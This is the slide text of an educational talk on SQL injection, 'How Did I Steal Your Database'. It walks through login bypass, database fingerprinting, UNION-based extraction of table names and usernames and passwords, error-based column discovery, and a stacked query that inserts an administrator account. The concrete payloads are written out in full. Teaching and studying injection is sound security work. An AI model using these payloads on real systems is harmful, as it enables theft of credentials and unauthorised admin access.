Post on 08-Jul-2015
How Did I Steal Your DatabaseMostafa Siraj
Application Security Expert
DISCLAIMER
Hacking websites is ILLEGAL
This presentation is meant for educational purposes ONLY
Only use this stuff on YOUR website and YOUR account
Nearly all applications rely on a Datastore
What is Database
• A Collection of Tables (Users, Orders, Countries,..etc)
• The tables are a collection of columns/rowsUsername Password First_Na
meLast_Name
Email IsAdmin
Elprince Elprince123
Ahmed ElMasry elprince123@example.com
Yes
ElnegmTamer
Password123
Tamer Tamer Tamer123@example.com
No
…… ….. …… …… ……`
What is SQL
• A query language that allows interacting with the database
• SQL can
– Retrieve data from the database
– Insert new records in the database
– Delete records from the database
– Update records in the database
SQL Queries
• To get all data about Username elprince:
SELECT Username,Password, First_Name,Last_Name, Password
FROM Users
WHERE Username=‘elprince’
• Gives a result:
Elprince Elprince123 Ahmed ElMasry elprince123@example.com
FACT
• Amongst Codd's rules for a Relational Database:
– Metadata must be stored in the database just as regular data is
SQL Injection
• is a technique where an attacker creates or alters existing SQL commands
– Expose hidden data (e.g. steal all the records from the tables)
– Override the data (e.g. Administrators password)
– Execute dangerous system level commands on the database host
SQL Injection Login Example
SELECT * FROM Users WHERE Username=‘username’ AND Password=‘password’
• If the user entered Elprince, Elprince123 the query will be
SELECT * FROM Users WHERE Username=‘Elprince’ AND Password=‘Elprince123’
SQL Injection Ex Cont
• Suppose the User entered ‘ OR 1=1--, 123 the query will be
SELECT * FROM Users WHERE
Username=‘‘ OR 1=1--’ AND Password=‘123’
• -- comments everything afterwards, so the query will be
SELECT * FROM Users WHERE
Username=‘‘ OR 1=1--
This is not enough
• You can enhance the injection to login with the administrator account
Enter ‘ or 1=1 ORDER BY 1--, abc the query will be
SELECT * FROM Users WHERE
Username=‘‘ OR 1=1 ORDER BY 1--’ AND Password=‘123’
Finding SQL Injection Bugs
• Submit single quotation mark and observe the result
• Submit two single quotations and observe the result
Finding SQL Injection Bugs
• For multistate processes, complete all the states before observing the results
• For search fields try using the wildcard character %
Finding SQL Injection Bugs
• For numeric data, if the original value was 2 try submitting
1+1 or 3-1
• If successful try using SQL-specific keywords, e.g.
67-ASCII(‘A’)
• If single quotes are filtered try
51-ASCII(1) [note ASCII(1)=49]
Identify the database engine
• The error messages will let us know the DB engine
• We can guess the DB based on OS or Web Server (e.g. LAMP: Linux+Apache+PHP+….)
Identify the database engine
•Use specific characters or commands:
String concatenation in different DB engines
: ‘||’FOO
: ‘+’FOO
: ‘ ‘FOO *note the space btw the 2 quotes]
Identify User privileges
• ‘ and 1 in (SELECT user) --
• ‘; IF user=‘admin’ WAITFOR DELAY ‘0:0:10’--
Injection in Search Fields
35
Entering Normal Input
Search Results
Trying Single Quote
I receive this error
Error states that it’s
Suppose I still don’t know the DB engine, Is it
Note: string concatenation in is +
I’m having an error, it’s not
Is it
Note: string concatenation in Oracle is ||
Different error, still not
Is it
Note: string concatenation in MySQL is blank space
It’s
The query in the backendis something like that
SELECT …,…,…,…,…
FROM ….
WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE….
A possible location for my input
The Strategy
1. Get number of items after the SELECT statement
SELECT …,…,…,…,…
FROM ….
WHERE ….=…. AND ….!=….. OR …..>……
How many items are here
The Strategy
2. Identify the location of the STRINGS in the SELECT Statement
SELECT …,…,…,…,…
FROM ….
WHERE ….=…. AND ….!=….. OR …..>……
Which of those are strings
The Strategy
3. Get the Structure of the database
SELECT …,…,…,…,…
FROM ….
WHERE …. UNION
SELECT ….,TableNames,….,….,…
FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
The Strategy
4. Get the data from the database
SELECT …,…,…,…,…
FROM ….
WHERE …. UNION
SELECT ….,Usernames,….,….,…
FROM Users --=…. AND ….!=….. OR …..>……
The Strategy
1. Get number of items after the SELECT statement
2. Identify the location of the STRINGS in the SELECT Statement
3. Get the Structure of the database
4. Get the data from the database
1. Get number of items after the SELECT statement
Error
Try another number
Result
Why the results are less?
Try another number
Error, it’s not 8
Let’s try 7
Result
How many columns do we have in the SELECT statement
The Strategy
1. Get number of items after the SELECT statement
2. Identify the location of the STRINGS in the SELECT Statement
3. Get the Structure of the database
4. Get the data from the database
2. Identify the location of the STRINGS in the SELECT Statement
1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Result
Get the Strings and the locations
1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
Result
The Strategy
1. Get number of items after the SELECT statement
2. Identify the location of the STRINGS in the SELECT Statement
3. Get the Structure of the database
4. Get the data from the database
3. Get the Structure of the database
1234') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULLFROM information_schema.tables#
Result
The Strategy
1. Get number of items after the SELECT statement
2. Identify the location of the STRINGS in the SELECT Statement
3. Get the Structure of the database
4. Get the data from the database
Next Queries
1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULLFROM information_schema.columns where table_name=‘USERS'#
1234') UNION SELECTNULL,NULL,NULL,username,password,null,nullFROM users WHERE id<100#
…….
Continue till you get all the tables
The Strategy
1. Get number of items after the SELECT statement
2. Identify the location of the STRINGS in the SELECT Statement
3. Get the Structure of the database
4. Get the data from the database
Injection with errors
Gives me an Error
Getting version
' and 1 in (SELECT @@version)--
Gives me this error
Getting Column names
I get this Error
Getting next column name
' group by login.firstname having 1=1--
I get this error
Again
' group by login.firstname, login.surname having 1=1--
Error reveals new column name
Again
' group by login.firstname, login.surname,login.username having 1=1--
New column name
Continue…
Continue…
Continue…
• After getting all of the columns I found a field called IsAdmin -that’s my goal -
• Putting the following query creates an admin account on the application
‘; INSERT INTO Login
(username,pwd,IsAdmin,……)
VALUES
(‘Administrator’,’******’,TRUE,…..)
Not all Injections generate errors
DEMO
SQLMap
You Were GREAT Audience
Thank You
@mostafasiraj
Mostafa Siraj